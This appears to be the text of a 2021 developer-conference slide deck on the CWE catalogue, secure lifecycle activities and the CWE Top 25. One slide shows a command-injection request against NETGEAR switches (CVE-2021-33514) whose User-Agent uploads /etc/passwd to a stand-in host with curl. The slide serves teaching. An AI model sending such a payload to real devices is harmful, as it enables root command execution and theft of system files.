Common Weakness Enumeration - CWE - and the Top 25 Most Dangerous Software Weaknesses - Karlsruher ...
Common Weakness Enumeration – CWE
…and the Top 25 Most Dangerous Software Weaknesses
Karlsruher Entwicklertag 2021, Zoom conference, 09.06.2021
Christian Titze, Security Consulting & Penetration Testing
christian.titze@secorvo.de
[Figure: software development lifecycle with the phases Requirements, Design, Implementation, Verification, Release, Maintenance. A Penetration Test sits in Verification and turns up forgotten items (Requirements), Flaws (Design) and Bugs (Implementation). Icons made by Freepik, Smashicons from www.flaticon.com]

[Same figure, additionally annotated with Delays.]

[Chart: Relative Cost to Fix (based on time of detection), scale 0x to 30x, by phase: Requirements / Architecture, Coding, Integration / Component Testing, System / Acceptance Testing, Production / Post-Release. Source: National Institute of Standards and Technology (NIST)]

[Chart: Relative Cost of Fixing Defects, scale 0x to 100x, by phase: Design, Implementation, Testing, Maintenance. Source: IBM System Science Institute]

The later a problem is fixed, the more expensive it gets.
“If you fail a penetration test you know you have a very bad problem indeed. If you pass a penetration test you do not know that you don’t have a very bad problem.”
― Gary McGraw*
* According to OWASP Testing Guide v3

Security activities per lifecycle phase:

Requirements: Security Requirements; Security Risk Assessment; Privacy Risk Assessment
Design: Attack Surface Analysis; Threat Modeling; Abuse Cases & Attack Trees; Security Design Reviews
Implementation: Code & Configuration Reviews; Secure by Default Configuration; Static Analysis; Approved Tools, Functions, Libraries; Trustworthy Dependencies
Verification: Dynamic Analysis; Fuzzing; Attack Surface Review; Penetration Testing
Release: Infrastructure Configuration Review; Incident Response Plan
Maintenance: Periodic Configuration Reviews; Periodic Penetration Tests; Dedicated Security Update Channel

[Figure: the lifecycle again, now with a Training phase in front: Training, Requirements, Design, Implementation, Verification, Release, Maintenance.]
[Figure: the relation between Weaknesses (CWE), Attack Patterns (CAPEC), “serious 1337 skillz”, an Exploit and Vulnerabilities (CVE).]

“Weaknesses are things that can be a problem in the right conditions. Those right conditions are what makes them vulnerabilities.”
― Robert Martin, CWE/CAPEC Program Manager

CVE: Concrete, product- and version-specific, publicly known vulnerabilities.
CWE: A formal catalogue of weaknesses in software and hardware that can be the root causes of vulnerabilities.
CAPEC: A formal catalogue of implementation-independent attack techniques, including the typical steps for carrying out the attack.

CVE-2021-33514
Unauthenticated Command Injection in Certain NETGEAR Smart Switches
Severity: 8.8 / 10.0
[Image: NETGEAR]

GET /sqfs/home/web/cgi/setup.cgi?token=';$HTTP_USER_AGENT;'
User-Agent: curl --upload-file /etc/passwd http://evil.sink/

How the three catalogues map onto this one request:
Attack pattern: CAPEC-88 (OS Command Injection)
Vulnerability: CVE-2021-33514
Weakness: CWE-78 (Improper Neutralization of Special Elements used in an OS Command, 'OS Command Injection')
Impact: an unauthenticated attacker on the LAN gets command execution as root.
CWE abstraction levels: View, Category, Pillar, Class, Base, Variant

Example chain from Class down to Variant:
Class:   CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
Base:    CWE-787: Out-of-Bounds Write
Variant: CWE-121: Stack-based Buffer Overflow

CWE Top 25 Most Dangerous Software Weaknesses (...and Weaknesses on the Cusp)
[Figure: the lifecycle phases Training, Requirements, Design, Implementation, Verification, Release, Maintenance.]

Unfortunately not for software weaknesses…